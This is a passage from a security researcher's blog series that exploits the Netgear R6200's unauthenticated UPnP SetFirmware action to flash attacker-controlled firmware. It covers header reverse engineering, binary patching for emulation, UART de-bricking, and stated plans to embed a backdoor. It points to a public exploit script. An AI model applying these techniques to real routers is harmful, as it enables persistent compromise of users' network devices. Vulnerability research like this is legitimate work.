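    """Model the size/checksum trailer at the end of the flash partition.

    byte_order is an assumption; flip it to ">" if the hardware differs.
    """
    # Erase the final block; erased flash reads back as all 0xFF.
    partition[-ERASE_SIZE:] = b"\xff" * ERASE_SIZE
    # Seek to 8 bytes before the end and write the two 32-bit values.
    partition[-8:] = struct.pack(byte_order + "II", trx_size, trx_checksum)
    return partition


# Hypothetical two-block partition, with a made-up size and checksum.
fake_partition = write_trailer(bytearray(2 * ERASE_SIZE), 0x3EE500, 0x12345678)
print(fake_partition[-8:].hex())
```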

This problem is easily solved. We already have the TRX image size at offset 24. That's the size that got checked against a limit of 4MB. It's also the size that is used to determine how much data to write to flash. We just need to add the TRX checksum at offset 16:

SC.gadget_section(self.TRX_IMG_CHECKSUM_OFF_1,self.trx_image_checksum,description="Checksum of TRX image. This gets verified by CFE on boot.")

With that done (and the router recovered back to a stock firmware), we can try again. And when we do, success! The router boots up completely to an interactive console.

Let's take a break for a second and reflect on where we are. We've successfully exploited a broken, abandoned, and forgotten capability in order to upload a firmware that we control to the Netgear R6200 over the network without authentication. We had to overcome the following challenges to get here:

Reverse engineer the UPnP daemon.

Come up with silly timing games necessary to work around the broken networking code.

Binary patch, emulate, and debug upnpd and httpd.

Work out what the SOAP request should look like, since the “parsing” is just a bunch of strstr() calls against the *entire* HTTP request, spread across a whole bunch of different functions.

Reverse engineer the legitimate firmware format, as parsed by httpd.

Reverse engineer how upnpd parses the firmware format.

A few things remain before we can declare victory. We need to:

Embed a tool in the minimized stage 1 firmware image that will download the larger stage 2 firmware.

Successfully write the downloaded firmware to flash so that CFE is satisfied and will boot it.

Embed some sort of backdoor in the larger firmware. After all, that's the point of the exercise, right?

Before wrapping up the series, I'll discuss all three of these things. Before that, though, I'll discuss an intermittent crasher due to an invalid free() that you may or may not have encountered. Avoiding it is necessary to ensure the router reboots into the stage 1 firmware. I'll talk about how we can abuse the firmware header in such a way as to prevent crashing.

------------------------------
[1] When I did this project the first time around, back in December 2013 and January 2014, I hadn't discovered samba hiding out in /usr/local/samba. After deleting all the nonessential stuff from /usr/sbin and /lib, the SquashFS filesystem was still about a MB over the 2.7MB we need. What I ultimately did back then was to delete the (huge!) 4.1MB wl.ko from /lib/modules/2.6.22/kernel/drivers/net/wl. This, unfortunately, is the kernel module for the wireless hardware. Deleting this meant when the system booted there would be no WiFi. The system still worked and had network connectivity, but this was a very intrusive modification that I was never really happy with. Fortunately, finding the Samba installation in a non-standard directory means we don't need to remove the wireless driver.

[2] This is in the git repository linked earlier. The exploit script is setfirmware.py.

Thursday, July 09, 2015

Debugging and De-bricking the Netgear R6200 via UART

Update: I forgot to credit my former colleague, Tim (@bjt2n3904), for helping me locate the UART header. This project would have been way more challenging without the serial connection. It would have involved desoldering the flash memory chip, probably replacing it with a ZIF socket, and then removing and reprogramming the chip for each iteration of testing.

In the previous installment, we filled out the ambit firmware header just enough to satisfy Netgear's broken UPnP server. We also patched out several ioctl() calls in upnpd in order to test the SetFirmware exploit in emulation.

We're now at the point that emulation is no longer adequate; we need to start testing against actual hardware. There are subtle and not-so-subtle differences between emulation and hardware that affect how the exploit works. Some exploits, such as command injections and even buffer overflows, can be tested and developed entirely in emulation. Since this exploit writes a firmware image to flash memory, we need to ensure it is written to physical storage properly and will successfully boot and run.

Experimentation with modifying a device's firmware calls for some sort of connectivity at a lower level than just a Linux shell. If the operating system fails to boot, there is no shell. We'll need to connect to the device in order to diagnose the problem and recover. The iterative process of developing the small, bootstrap firmware that I will describe later entails many incomplete builds that will leave the device in a semi-broken state. Knowing that you can recover by restoring a good firmware makes the project much less risky.

3 male-to-female jumper wires of different colors (black, orange, and yellow are ideal)

Hunting for UART Header

Fortunately the R6200 has a UART header you can connect to using a serial terminal application such as Minicom. With Minicom, you can interact with the bootloader to see diagnostic messages and even drop into a recovery console.

To interface with the R6200's UART, you can use a cable like the FTDI 3.3V USB to Serial cable (part number TTL-232R-3V3-2MM). It's available from Allied Electronics, Amazon, SparkFun, and others.

USB to UART cable for serial debugging

The UART connection isn't exactly set up and ready for you to use, though. This means taking apart your router and heating up your soldering iron.

There are a couple of torx screws that hold the base on.

Then there are a couple more torx screws that hold the outer shell together. These are the same size as the previous ones, but different length. Keep them organized if you plan to put the router back together.

More screws.

With the outer screws removed, you can start separating the front and back half of the clamshell. There are plastic tabs all the way around that hold it together. I broke a few trying to get it open. Once you get the front half off, you'll find the PCB held in by more torx screws.

Once you remove the PCB, you can locate the UART header, which is exposed as four solder pads.

The solder pads, from left to right, are VCC, ground, transmit, and receive. You don't need VCC; it's +3.3V power. The USB adapter is powered by your computer's USB port, instead. That leaves ground, TX, and RX. The transmit and receive are relative to the device, so transmit from the device connects to receive of your cable and vice versa. Solder short leads to the appropriate pads, and connect your jumper wires to them. Then, route the jumpers out of the case so you can access the UART once you reassemble your router. I drilled a small hole in the top for a passthrough.

Here's how the UART header maps to the USB adapter's pinout:

Device GND <-> Adapter GND (black)

Device TX <-> Adapter RX (yellow)

Device RX <-> Adapter TX (orange)

If you have orange, yellow, and black jumpers, connecting them up so the colors match the USB adapter will save you some trouble. Sadly, I had green, pink, and blue on hand, so mine is exciting and confusing every time I hook it up.

Then, I zip-tied the leads to reduce stress on them.

Connecting Using Minicom

You may want to test the serial connection before reassembling. The baud rate is 115,200 and serial port settings should be 8,N,1. Here's my Minicom configuration for the R6200. Obviously adjust your ttyUSB device as appropriate, but it's usually /dev/ttyUSB0.

When you connect with Minicom and power on the R6200, you can see the boot text scrolling across the console. If you let it boot, and hit return in the console, it gives you a root prompt. It's not a great terminal environment, though. There's no scrollback, for example. Once you have a serial console, use netgear-telnetenable[1] to fire up the telnet backdoor.

Shitty terminal environments aside, the serial console is great for restoring to a non-broken firmware. As long as nothing trashed the flash partition that contains the CFE boot loader, you can break in to a debug prompt and do a restore.

When you first power on the device and see CFE loading, break in with ctrl+c. You need to break in right after CFE starts, but before it finishes loading the kernel and operating system from flash. Incidentally, this gets trickier after we shrink the firmware down from nearly 9MB to under 4MB because the load time shortens dramatically, narrowing the window when you can break in.

Recovering a Bricked Router

If you break in at just the right time (I just mash ctrl+c repeatedly), you should get a CFE> prompt. Once you've got the prompt you can start up CFE's TFTP server with the tftpd command to restore a factory firmware.

The router's network configuration is 192.168.1.1/24. There's no DHCP server in this mode, so you'll need to configure your own network interface manually. You'll need a tftp client to upload the firmware image. TIP: Be sure to switch your client to binary mode. This gets me every time.

When you reboot, the router should be back to normal. Now you can iteratively test custom firmware knowing that it only takes a minute or two to restore back to a good one.

In the next part, we'll regenerate the SquashFS filesystem. We'll also work on shrinking the firmware down to 4MB to avoid crashing upnpd during exploitation. We'll need to hunt down and eliminate nonessential services, while avoiding breaking the boot sequence. Stay tuned!

------------------------------
[1] Did you know that nearly every one of Netgear's consumer devices has a well-known but unacknowledged backdoor? It's true. What the fuck are we even doing here. Who needs trojaned firmware when Netgear devices already have a backdoor. http://wiki.openwrt.org/toh/netgear/telnet.console

Thursday, June 25, 2015

In the previous part, we switched gears back to the Netgear R6200 upnpd after spending some time analyzing httpd. The HTTP daemon provided an understanding of how the firmware header is supposed to be constructed. We found a header parsing function in upnpd that was similar to its httpd counterpart. So similar that it has the same memcpy() buffer overflow. This overflow was more interesting this time around, as it did not require authentication. Additionally, we discovered a reference to the "Ambit image" via an error message string. Presumably an ambit image is a firmware format analogous to TRX. In this case, however, the ambit image encapsulates a TRX image.

In this part we will identify more fields of the Ambit header, as well as run up against a limitation of QEMU: attempts to open and write to the flash memory device will fail since, in emulation, there is no actual flash memory. We'll need to patch the upnpd binary in order to work around this. I previously covered binary patching for emulation here.

Updated Exploit Code

The janky_ambit_header.py module has been updated to reflect the additional fields we add to the header in this part. You can find the updated code and README in the part_9 directory. Now is a good time to do a pull or to clone the repository from: https://github.com/zcutlip/broken_abandoned

We Should Have Checked the Firmware Size Before Now

The sa_CheckBoardID() function, analogous to abCheckBoardID() from httpd, returns success if the following is true:

The ambit magic number is found at offset 0.

The header size field doesn't cause an overflow during the memcpy() operation.

The checksum in the ambit header matches the header's actual checksum.

The proper board ID string is found at the end of the ambit header.

After sa_CheckBoardID(), at 0x00423CAC, we see several 32-bit fields parsed out. It remains to be seen how these values get used; presumably they are the same fields and get used the same way as in the httpd firmware validation. Then the size field from offset 24 is checked. It must be less than 0x400001, or 4194305, or firmware validation fails.

Somewhat ironically, this check can never fail, assuming the size field is truthful. If the firmware image is larger than this size, then upnpd will crash, having overflowed the 4MB buffer allocated for base64 decoding. In our proof-of-concept code, the size field contains a bogus value, and execution skips down to an error message.

The error message betrays someone's continued confusion over exactly how this capability is supposed to work. If the size validation fails, the error message is "The kernel image is over 512Kbytes!", although the test was against a 4MB upper limit.
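The irony is easier to see with the two limits side by side. This is a minimal model of the comparison, not upnpd's actual code: the function and constant names are invented, and only the two numeric limits and the error string come from the analysis above.

```python
SIZE_LIMIT = 0x400001   # size field at offset 24 must be less than this
DECODE_BUF = 0x400000   # buffer allocated for the Base64-decoded request


def size_check_passes(trx_size):
    """Model of the check on the size field at offset 24."""
    return trx_size < SIZE_LIMIT


def validate(trx_size):
    if not size_check_passes(trx_size):
        return "The kernel image is over 512Kbytes!"
    return "ok"


# Any image that fits in the decode buffer also passes the check, so a
# truthful size field can only fail for an image that has already
# overflowed the buffer during decoding.
print(validate(DECODE_BUF))      # largest size that still fits the buffer
print(validate(0x41414141))      # bogus size, as in the proof of concept
```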

Inserting the proper TRX image size (or "kernel size" as the error message indicates) at offset 24 gets past this step. After the check, a function is called at 0x0042428C, sa_upgrade_setImageInfo(), that parses out several more values from the header. Again, no validation is performed on these values at this point. It remains to be seen if they are the same fields and will be used in the same way as in httpd.

After this function is called, things begin to get interesting in a few ways. After a temporary "upgrade" file is created (but never used; wtf), the /dev/mtd1 device is opened. You'll need to work around the fact that QEMU doesn't provide this device. The following things will fail if not addressed.

First, opening mtd1 will fail if it doesn't already exist. Create an empty file to ensure the open() operation is successful.

Opening /dev/mtd1 with O_RDWR.
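Creating the placeholder is a one-time step in the emulated root filesystem. A minimal sketch, assuming the extracted firmware lives in a directory you chroot into for QEMU; the `create_fake_mtd()` name and the rootfs path are hypothetical.

```python
import os


def create_fake_mtd(rootfs, device="dev/mtd1"):
    """Create an empty regular file where upnpd expects the flash device."""
    path = os.path.join(rootfs, device)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    # Append mode creates the file if missing and leaves existing data alone.
    with open(path, "ab"):
        pass
    return path


if __name__ == "__main__":
    import sys
    # Hypothetical usage: python fake_mtd.py ./rootfs
    if len(sys.argv) > 1:
        fake = create_fake_mtd(sys.argv[1])
        # Confirm the file can be opened read/write, as upnpd will do.
        os.close(os.open(fake, os.O_RDWR))
        print("created", fake)
```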

Next, a series of ioctl()s is performed on the open file descriptor. To understand what these operations do, it's helpful to refer to mtd.c from the OpenWRT source code as a guide.

The first ioctl() will fail in emulation since we're just providing a regular file, not a device node. Patch out this operation with something that puts 0 in $v0, such as xor $v0,$v0.

ioctl is patched out.

This ioctl() we just patched out obtains, among other things, the erase size (i.e., block size) for the mtd device. We can simulate that result by patching at 0x0042453C, where the erase size is loaded into register $s5.

It doesn't matter a great deal what you use for the erase size in emulation. The write loop will write the firmware in blocks of that size, then it will write any remaining fractional block at the end. An actual R6200 device reports a block size of 65536, or 0x10000, so that's a good number to use. Patching this instruction with:

lui $s5, 1

loads 1 into the upper half of register $s5 and 0x0 into the lower half, resulting in a value of 0x10000.

Patch in a constant 0x10000 for mtd1 block size.
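If you'd rather apply these patches with a script than by hand, the two replacement instructions are easy to assemble. This sketch encodes them from the standard MIPS32 R-type and I-type layouts. The byte order written into the file and the `patch_word()` helper are assumptions for illustration, and the file offset for a given virtual address depends on how the ELF segments are laid out, so it is left as a parameter.

```python
import struct

# MIPS general-purpose register numbers for the two registers used here.
REG = {"$v0": 2, "$s5": 21}


def encode_xor(rd, rs, rt):
    """R-type: opcode 0, funct 0x26. xor rd, rs, rt"""
    return (REG[rs] << 21) | (REG[rt] << 16) | (REG[rd] << 11) | 0x26


def encode_lui(rt, imm):
    """I-type: opcode 0x0F. lui rt, imm loads imm into the upper 16 bits."""
    return (0x0F << 26) | (REG[rt] << 16) | (imm & 0xFFFF)


def patch_word(binary, file_offset, word, byte_order="<"):
    """Overwrite one 32-bit instruction in a bytearray copy of the binary.

    byte_order is an assumption; use ">" for a big-endian target.
    """
    binary[file_offset:file_offset + 4] = struct.pack(byte_order + "I", word)


print(hex(encode_xor("$v0", "$v0", "$v0")))   # xor $v0, $v0, $v0
print(hex(encode_lui("$s5", 1)))              # lui $s5, 1
```

The first instruction zeroes $v0 in place of a failing ioctl() call, and the second produces the 0x10000 erase size.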

Next, in the basic block starting at 0x004245D0, there are two more ioctl()s. The first one most likely unlocks the current portion of flash for writing. The return value from it isn't checked, and execution immediately proceeds to the second. Based on the error message, the second one erases the block of flash so it can be rewritten. With our fake /dev/mtd1 there's no need to erase, so we can patch out this operation as before.

Patch out the ioctl() to erase flash memory.

Now, having patched out the ioctl()s that fail in emulation, writing to a regular file should work as normal. There is one more field that, while not validated directly, does affect what data gets written. When analyzing httpd, we discovered the field at offset 28 that contains the size of a theoretical second partition. In stock firmware this field is zeroed out. In upnpd, at 0x004245C0, this value is added to the address of the TRX image, and the result is the start of data that gets written to flash.

The start of firmware data is calculated.

In other words, the pointer to data that gets written is calculated as:

This doesn't make sense and further betrays the programmer's confusion over how this algorithm should work and how the firmware should be formatted. At any rate, if we zero out the field at byte 28, everything works fine. The address of the TRX image will be the start of data written to flash.
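Putting the start calculation and the write loop together gives a rough model of what ends up in /dev/mtd1. This is a sketch based only on the behavior described above: the start of data is the TRX image address plus the field at offset 28, the length comes from the size field at offset 24, and data goes out in erase-size blocks followed by any fractional block. The function name and the offsets used in the example are made up.

```python
import io


def write_loop(image, trx_offset, trx_size, part2_size, out, erase_size=0x10000):
    """Model upnpd's write loop against a file-like object."""
    # The questionable calculation: the partition 2 size shifts the start.
    start = trx_offset + part2_size
    data = image[start:start + trx_size]

    full_blocks, remainder = divmod(len(data), erase_size)
    for i in range(full_blocks):
        out.write(data[i * erase_size:(i + 1) * erase_size])
    if remainder:
        # Final fractional block.
        out.write(data[full_blocks * erase_size:])
    return full_blocks, remainder


# Hypothetical image: a 58-byte header followed by a fake TRX payload.
header = b"H" * 58
payload = b"T" * (2 * 0x10000 + 5)
fake_mtd = io.BytesIO()
print(write_loop(header + payload, len(header), len(payload), 0, fake_mtd))
```

With the field at offset 28 zeroed, the bytes written match the TRX payload exactly. Any nonzero value skips that many bytes at the front of it.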

At this stage upnpd is ready to write our firmware to /dev/mtd1. Let's have a review of what portions of the ambit header had to be verified before getting here.

There's our familiar ambit header. It looks similar to the header diagram from our httpd analysis, except there's still a lot of gray in there. Only six fields have been validated by upnpd up to this point:

Ambit magic number

Header length

Header checksum

TRX image size (partition 1, aka "kernel")

Partition 2 size (not validated, but affects what gets written to flash)

Board ID string

That was easier than expected. When I sent the "firmware image" generated from random data to upnpd, my QEMU machine rebooted. This is because after the write loop, upnpd triggers a reboot so the new firmware will take effect. Our fake "/dev/mtd1" has even grown to 3.9MB as a result of the firmware writing.

At this point we've successfully exploited the SetFirmware UPnP SOAP action. We've gone as far as we can go with emulation. From here we'll move to physical hardware to test and develop the deployment of our firmware. In the next post, I'll describe connecting to the R6200 router's debug interface over its UART connection, so get your soldering iron ready.

Spoiler: I'll go ahead and say we're not quite home free yet. Don't attempt to generate an image and flash it to your router yet. At best, the write will still fail. At worst, you'll brick it. Besides not having generated a valid squashfs filesystem and TRX image, there are at least two more header fields that will trip you up before you're done. Once we get access over UART figured out, it will be possible to recover a bricked device.